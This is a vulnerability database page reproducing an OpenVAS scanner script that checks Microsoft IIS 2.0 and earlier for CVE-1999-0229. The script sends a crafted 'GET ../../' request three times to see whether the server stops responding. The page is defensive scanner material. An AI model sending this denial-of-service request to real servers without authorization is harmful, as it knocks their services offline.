Microsoft IIS <= 2.0 GET Request DoS Vulnerability
🗓️ 22 May 2012 00:00:00Reported by Copyright (C) 2012 Greenbone AGType
openvas🔗 plugins.openvas.org👁 56 Views
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| CVE-1999-0229 | 4 Feb 200005:00 | – | cve | |
| CVE-1999-0229 | 4 Feb 200005:00 | – | cvelist | |
| EUVD-1999-0229 | 7 Oct 202500:30 | – | euvd | |
| Microsoft IIS Traversal GET Request Remote DoS | 22 Jun 199900:00 | – | nessus | |
| CVE-1999-0229 | 12 May 199904:00 | – | nvd | |
| PT-1999-1020 · Microsoft · Windows Nt Iis Server | 12 May 199900:00 | – | ptsecurity | |
| CVE-1999-0229 | 7 Jan 202609:42 | – | redhatcve |
# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:microsoft:internet_information_services";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.902914");
script_version("2026-04-28T06:28:06+0000");
script_cve_id("CVE-1999-0229");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_tag(name:"last_modification", value:"2026-04-28 06:28:06 +0000 (Tue, 28 Apr 2026)");
script_tag(name:"creation_date", value:"2012-05-22 12:45:33 +0530 (Tue, 22 May 2012)");
script_name("Microsoft IIS <= 2.0 GET Request DoS Vulnerability");
script_category(ACT_DENIAL);
script_copyright("Copyright (C) 2012 Greenbone AG");
script_family("Web Servers");
script_require_ports("Services/www", 80);
script_dependencies("gb_microsoft_iis_http_detect.nasl");
script_mandatory_keys("IIS/installed");
script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/1638");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/2218");
script_xref(name:"URL", value:"http://en.securitylab.ru/nvd/246425.php");
script_xref(name:"URL", value:"http://www.iss.net/security_center/reference/vuln/HTTP_DotDot.htm");
script_tag(name:"summary", value:"Microsoft IIS Webserver is prone to a denial of service (DoS)
vulnerability.");
script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks if the service is
still responding.");
script_tag(name:"insight", value:"The flaw is due to an error in the handling of HTTP GET requests
that contain a tunable number of '../' sequences in the URL.");
script_tag(name:"impact", value:"Successful exploitation will let the remote unauthenticated
attackers to force the IIS server to become unresponsive until the IIS service is restarted
manually by the administrator.");
script_tag(name:"affected", value:"Microsoft Internet Information Services (IIS) 2.0 and prior on
Microsoft Windows NT.");
script_tag(name:"solution", value:"Upgrade to latest version of IIS and latest Microsoft Service
Packs.");
script_tag(name:"qod_type", value:"remote_analysis");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("http_func.inc");
include("host_details.inc");
if(!port = get_app_port(cpe:CPE, service:"www"))
exit(0);
if(!get_app_location(cpe:CPE, port:port, nofork:TRUE))
exit(0);
# nb:
# - http_is_dead() used below might fork on multiple hostnames and should be always before the first
# http_send_recv() call
# - For simplicity within such an older check we're just calling http_host_name() instead directly
# here as it will also fork
http_host_name(port:port);
for(i = 0; i < 3; i++)
res = http_send_recv(port:port, data:'GET ../../\r\n');
sleep(3);
if(http_is_dead(port:port) && !res) {
security_message(port:port);
exit(0);
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Apr 2026 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 25
EPSS0.05873